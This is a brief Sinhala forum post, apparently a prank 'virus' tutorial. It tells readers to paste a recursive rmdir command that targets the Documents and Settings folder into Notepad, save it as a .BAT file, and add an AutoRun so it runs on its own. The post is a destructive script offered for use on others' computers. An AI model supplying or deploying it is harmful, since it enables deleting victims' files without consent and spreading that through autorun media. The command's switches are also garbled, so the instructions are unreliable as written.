වයිරස් එකක් හදල My Document එක Delete කරල දාමුද? මේකට කරන්න තියෙන්නේ මෙච්චරයි, හැමදාම වගේම මේකත් Notpad සෙල්ලමක්
, මම මේ පහල දීල තියන  Code එක Copy කරල Notepad එකේ paste කර ගන්න,
rmdir C:\Documents and Settings \S\Q
 හේ හේ දැන් මේක Save කරගන්නයි තියෙන්නෙ,නමක් දිලා අවසානේ Extension එකට .BATකියල දීලා Save කරන්න, වැඩේ ගොඩ, මේකටත් Auto Run එකක් දාල පාවිච්චි කරන්න පුලුවන් යාළුවනේ
 
Top